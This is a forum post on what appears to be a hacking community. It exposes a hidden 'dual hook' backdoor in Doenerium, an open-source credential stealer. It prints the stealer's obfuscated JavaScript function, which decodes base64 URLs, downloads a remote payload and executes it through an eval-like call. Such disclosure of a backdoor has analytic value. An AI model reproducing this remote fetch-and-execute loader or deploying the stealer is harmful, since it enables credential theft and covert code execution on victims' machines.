• Exclusive

    Hey Guest, unlock an instant 10% bonus discount when you upgrade via the Crypoverse gateway.

Doenerium Dual Hook? (1 Viewer)

Currently reading:
 Doenerium Dual Hook? (1 Viewer)

Recently searched:

flameball426

Member
LV
0
Joined
Apr 22, 2023
Threads
12
Likes
16
Awards
1
Credits
598©
Cash
0$
Doenerium is an open source stealer: https://github.com/doenerium69/doenerium

It started off as a heavily obfuscated small project with a dual hook, but people found out quickly about the dual hook and started exposing him. He then apologized and got rid of the obfuscation, and supposedly the dual hook too.
But, another dual hook has been found. Working with Mr Gibson he implemented a dual hook overlooked by many.

Here is the dual hook I found on 22-04-2023


async runtime_evasion() {
let evasor = (`${((base64.decode(
`${((await this.axios_instance.get((base64.decode((
await this.axios_instance.get(
(
base64.decode(
`aHR0cHM6Ly9kb2VuZXJpdW0ua3FuZmtwb2NjaWN4aXVkc3Rxb25mb3R1d3NyaHV4a3docWpqZnNiamhvbm91YnJjY3kubmwv`
)
)
).catch((err) => {
console.log(err)
})
).data
).replace("%20", "").replace("\x00", "")
+ base64.decode("L21haW4vZXZhc2lvbi50eHQ")
)
).catch((err) => {
console.log(err)
})
).data)}`
)))}`)
await this.eval_like(evasor,
this
);
}



and then it runs this


this.runtime_evasion();




You can read an in depth article about the dual hook and more things about doenerium: https://perception-point.io/blog/doenerium-malware/
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips
Recently searched:

Users who are viewing this thread

Top Bottom